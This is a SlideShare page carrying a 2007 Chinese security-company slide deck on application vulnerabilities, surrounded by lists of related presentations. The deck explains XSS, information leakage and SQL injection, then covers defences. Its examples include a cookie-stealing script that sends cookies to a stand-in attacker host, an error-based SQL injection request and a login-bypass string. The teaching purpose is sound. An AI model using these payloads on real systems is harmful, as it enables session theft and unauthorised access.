Enviar pesquisa
Carregar
2007 - 应用系统脆弱性概论
•
0 gostou
•
678 visualizações
Na Lee
Seguir
2007 年的一份文档
Leia menos
Leia mais
Internet
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 22
Baixar agora
Baixar para ler offline
Recomendados
PIC_Experience2
PIC_Experience2
ray chen
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir Lab
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分
Taien Wang
作業系統14組
作業系統14組
继洵 蔡
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV
Chen-Tien Tsai
基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗
Taien Wang
持续集成入门
持续集成入门
Lieping Xie
EuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein Rückblick
Markus Zapke-Gründemann
Recomendados
PIC_Experience2
PIC_Experience2
ray chen
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir 資安講座 II 使安全成為軟體開發的一部分
Hiiir Lab
使安全成為軟體開發必要部分
使安全成為軟體開發必要部分
Taien Wang
作業系統14組
作業系統14組
继洵 蔡
.NET Security Application/Web Development - Part IV
.NET Security Application/Web Development - Part IV
Chen-Tien Tsai
基礎網頁程式攻擊檢驗
基礎網頁程式攻擊檢驗
Taien Wang
持续集成入门
持续集成入门
Lieping Xie
EuroDjangoCon 2009 - Ein Rückblick
EuroDjangoCon 2009 - Ein Rückblick
Markus Zapke-Gründemann
Django-Queryset
Django-Queryset
Mindfire Solutions
Super Advanced Python –act1
Super Advanced Python –act1
Ke Wei Louis
Bottle - Python Web Microframework
Bottle - Python Web Microframework
Markus Zapke-Gründemann
Load testing
Load testing
Mindfire Solutions
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVC
Mindfire Solutions
User-centered open source
User-centered open source
Jacqueline Kazil
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘
Jiho Lee
Html5 History-API
Html5 History-API
Mindfire Solutions
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contrib
Tzu-ping Chung
PyClab.__init__(self)
PyClab.__init__(self)
Tzu-ping Chung
Digesting jQuery
Digesting jQuery
Mindfire Solutions
Django e il Rap Elia Contini
Django e il Rap Elia Contini
WEBdeBS
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlines
Markus Zapke-Gründemann
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python
Jiho Lee
NoSql Day - Apertura
NoSql Day - Apertura
WEBdeBS
Rabbitmq & Postgresql
Rabbitmq & Postgresql
Lucio Grenzi
Django mongodb -djangoday_
Django mongodb -djangoday_
WEBdeBS
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.py
Tzu-ping Chung
2 × 3 = 6
2 × 3 = 6
Tzu-ping Chung
Overview of Testing Talks at Pycon
Overview of Testing Talks at Pycon
Jacqueline Kazil
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
Nicolas su
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析
Nicolas su
Mais conteúdo relacionado
Destaque
Django-Queryset
Django-Queryset
Mindfire Solutions
Super Advanced Python –act1
Super Advanced Python –act1
Ke Wei Louis
Bottle - Python Web Microframework
Bottle - Python Web Microframework
Markus Zapke-Gründemann
Load testing
Load testing
Mindfire Solutions
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVC
Mindfire Solutions
User-centered open source
User-centered open source
Jacqueline Kazil
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘
Jiho Lee
Html5 History-API
Html5 History-API
Mindfire Solutions
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contrib
Tzu-ping Chung
PyClab.__init__(self)
PyClab.__init__(self)
Tzu-ping Chung
Digesting jQuery
Digesting jQuery
Mindfire Solutions
Django e il Rap Elia Contini
Django e il Rap Elia Contini
WEBdeBS
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlines
Markus Zapke-Gründemann
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python
Jiho Lee
NoSql Day - Apertura
NoSql Day - Apertura
WEBdeBS
Rabbitmq & Postgresql
Rabbitmq & Postgresql
Lucio Grenzi
Django mongodb -djangoday_
Django mongodb -djangoday_
WEBdeBS
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.py
Tzu-ping Chung
2 × 3 = 6
2 × 3 = 6
Tzu-ping Chung
Overview of Testing Talks at Pycon
Overview of Testing Talks at Pycon
Jacqueline Kazil
Destaque
(20)
Django-Queryset
Django-Queryset
Super Advanced Python –act1
Super Advanced Python –act1
Bottle - Python Web Microframework
Bottle - Python Web Microframework
Load testing
Load testing
Authentication & Authorization in ASPdotNet MVC
Authentication & Authorization in ASPdotNet MVC
User-centered open source
User-centered open source
라이트닝 토크 2015 파이콘
라이트닝 토크 2015 파이콘
Html5 History-API
Html5 History-API
The Django Book, Chapter 16: django.contrib
The Django Book, Chapter 16: django.contrib
PyClab.__init__(self)
PyClab.__init__(self)
Digesting jQuery
Digesting jQuery
Django e il Rap Elia Contini
Django e il Rap Elia Contini
Django - The Web framework for perfectionists with deadlines
Django - The Web framework for perfectionists with deadlines
2016 py con2016_lightingtalk_php to python
2016 py con2016_lightingtalk_php to python
NoSql Day - Apertura
NoSql Day - Apertura
Rabbitmq & Postgresql
Rabbitmq & Postgresql
Django mongodb -djangoday_
Django mongodb -djangoday_
The Django Book Chapter 9 - Django Workshop - Taipei.py
The Django Book Chapter 9 - Django Workshop - Taipei.py
2 × 3 = 6
2 × 3 = 6
Overview of Testing Talks at Pycon
Overview of Testing Talks at Pycon
Semelhante a 2007 - 应用系统脆弱性概论
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
Nicolas su
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析
Nicolas su
渗透测试思路技术与方法
渗透测试思路技术与方法
挺
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈
zhiyanhui
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版
Bruce Chen
分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值
ITband
Solution apc 4.0
Solution apc 4.0
ahnlabchina
开源应用日志收集系统
开源应用日志收集系统
reinhardx
Internet System Security Overview
Internet System Security Overview
ChinaNetCloud
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
NSFOCUS
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计
gb ku
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
ITband
Java day 2014_20140723_v2
Java day 2014_20140723_v2
peihsin1980
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac
Chao Zhu
SWsoft_Prim@Telecom
SWsoft_Prim@Telecom
webhostingguy
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Bill Hagestad II
軟體安全防護大作戰
軟體安全防護大作戰
Galaxy Software Services
CDP方案介绍
CDP方案介绍
acqua young
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」
Orange Tsai
阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划
mysqlops
Semelhante a 2007 - 应用系统脆弱性概论
(20)
議題二:Web應用程式安全防護
議題二:Web應用程式安全防護
議題三:政府網站常見弱點與分析
議題三:政府網站常見弱點與分析
渗透测试思路技术与方法
渗透测试思路技术与方法
互联网公司web安全挑战与防护思路浅谈
互联网公司web安全挑战与防护思路浅谈
OWASP Top 10 (2013) 正體中文版
OWASP Top 10 (2013) 正體中文版
分会场四服务器安全防护的意义与价值
分会场四服务器安全防护的意义与价值
Solution apc 4.0
Solution apc 4.0
开源应用日志收集系统
开源应用日志收集系统
Internet System Security Overview
Internet System Security Overview
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
军工行业网络安全解决方案整体设计
军工行业网络安全解决方案整体设计
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
分会场六利用赛门铁克的Sort工具降低风险,提高应用的持续运行时间 中文版
Java day 2014_20140723_v2
Java day 2014_20140723_v2
中大型规模的网站架构运维 Saac
中大型规模的网站架构运维 Saac
SWsoft_Prim@Telecom
SWsoft_Prim@Telecom
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
Chinese Uses of Big Data Cloud Security 漫步在雲端資安新戰場
軟體安全防護大作戰
軟體安全防護大作戰
CDP方案介绍
CDP方案介绍
WebConf 2013「Best Practices - The Upload」
WebConf 2013「Best Practices - The Upload」
阿里巴巴运维自动化的探索与规划
阿里巴巴运维自动化的探索与规划
Mais de Na Lee
Aruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdf
Na Lee
火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdf
Na Lee
2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法
Na Lee
02.python.开发最佳实践
02.python.开发最佳实践
Na Lee
01.python.开发最佳实践
01.python.开发最佳实践
Na Lee
手机网络游戏平台
手机网络游戏平台
Na Lee
淘宝连锁店
淘宝连锁店
Na Lee
Mais de Na Lee
(7)
Aruba-MESH-解决方案.pdf
Aruba-MESH-解决方案.pdf
火山引擎-飞连产品介绍.pdf
火山引擎-飞连产品介绍.pdf
2007 年互联网基础设施安全的想法
2007 年互联网基础设施安全的想法
02.python.开发最佳实践
02.python.开发最佳实践
01.python.开发最佳实践
01.python.开发最佳实践
手机网络游戏平台
手机网络游戏平台
淘宝连锁店
淘宝连锁店
2007 - 应用系统脆弱性概论
1.
应用系统脆弱性概论 绿盟科技 sbilly2007年9月
NSFocus Information Technology Co. Ltd. 密级:公开文档
2.
2 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 目录页 •应用系统脆弱性 •应用系统面临的攻击 •如何保护应用系统
3.
应用系统脆弱性 风险=F(资产, 脆弱性,
威胁)
4.
4 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统脆弱性 •什么是脆弱性 –脆弱性是风险的构成部分 •Risk = F (Asset,Threat,Vulnerability) –脆弱性是一个或一组资产中存在的,可能被一个或多个威 胁利用的脆弱之处 •被利用来攻击业务系统的漏洞 •应用系统脆弱性的构成 –应用系统的构成 •人、业务流程、软件、硬件 –应用系统脆弱性的构成 •人、业务流程、软件、硬件
5.
5 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统技术模型 •网络 –通信协议 –网络设备 •操作系统 –Windows –Linux •一般服务组件 –Web 服务 –数据库服务 •用户特定应用 –网银 –门户
6.
6 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 客户端同样会遭到攻击!
7.
应用系统所面临的攻击
8.
8 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
9.
9 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用通用脆弱性(Common Vulnerability)的攻击 –利用通信协议脆弱性的攻击: •ARP Spoof •DNS Poison •大部分拒绝服务攻击 –利用网络设备、操作系统、一般组件漏洞的攻击: •弱密码 •缺乏补丁 •配置失误
10.
10 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统面临的攻击 •利用特殊脆弱性(Custom Vulnerability)的攻击
11.
11 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 针对特定应用最常见的攻击 •背景资料 –时间:2006年1月1日至2006年12月31日 –测试应用数量:31373个 •最常见攻击 –跨站脚本 –信息泄漏 –SQL 注入
12.
12 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 跨站脚本-Cross-site Scripting •什么是跨站脚本 –Cross-site Scripting 或者XSS –跨站脚本是一种迫使应用系统向客户端回显攻击者所提交 可执行代码的攻击技巧,通常是针对浏览器的攻击,攻击 者提交的代码通常是HTML/JavaScript,但是也可以扩 展到VBScript/ActiveX/Java 等其他浏览器支持的技术上 •跨站脚本产生原因 –没有对用户数据进行校验和过滤 •跨站脚本的危害 –伪造信息,欺骗用户 –盗窃用户Cookie 中的敏感信息
13.
13 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某个站点页面 http://portal.example/index.php?sessionid=12312312&username=Joe 显示信息为Hello, Joe! –攻击者诱使用户点击链接 http://portal.example/index.php?sessionid=12312312& username=<script>document.location=‘http://attacker host.example/cgi- bin/cookiesteal.cgi?’+document.cookie</script> 就可以成 功窃取用户的Cookie 跨站脚本
14.
14 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 信息泄漏-Information Leakage •什么是信息泄漏 –Information Leakage –信息泄漏是攻击者通过某种方式获得应用系统某些敏感信 息的攻击技巧,通常是利用程序员遗留在代码中的注释或 者服务器程序的错误信息 •跨站脚本产生原因 –应用系统部署时没有将注释去掉 –应用系统部署时没有正确的配置服务器程序 •跨站脚本的危害 –有利于攻击者进一步的攻击,例如SQL 注入
15.
15 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在SQL 注入漏洞,攻击者提交请求 http://portal.example/index.asp? id=10 ;select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES— 将通过错误信息获得数据表的第一个表名 Microsoft OLE DB Provider for ODBC Drivers error '80040e07’ [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int. /index.asp, line 5 跨站脚本
16.
16 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 SQL 注入-SQL Injection •什么是SQL 注入 –SQL 注入 –SQL 注入是攻击者通过输入恶意的请求直接操作数据库服 务器的攻击技巧 •跨站脚本产生原因 –应用开发过程中没有对用户输入进行校验和过滤 •跨站脚本的危害 –机密数据泄漏 –服务器被控制
17.
17 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 •案例 –某站点存在以下代码 SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'“ strAuthCheck = GetQueryResult(SQLQuery) 攻击者提交的请求使得: strUsername=' OR ''=' strPassword=' OR ''=' 此时查询变成 SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''='' 攻击者直接绕过系统的身份验证 跨站脚本
18.
如何保护应用系统
19.
19 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 应用系统的脆弱性 •通信协议的脆弱性(通用) •网络设备的脆弱性(通用) •操作系统的脆弱性(通用) •一般服务组件的脆弱性(通用) •应用脆弱性(不通用)
20.
20 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 如何保护应用系统 •降低系统脆弱性 –通用脆弱性(Common Vulnerability) •补丁管理 •安全加固 •安全设备(Firewall、IPS、Anti-DoS) –特殊脆弱性(Custom Vulnerability) •安全编码 •应用安全测试 •Application Firewall •SQL Driver Proxy
21.
绿盟科技–巨人背后的专家 谢谢!
22.
22 © 2007
中联绿盟信息技术(北京)有限公司 密级:内部使用 Questions?
Baixar agora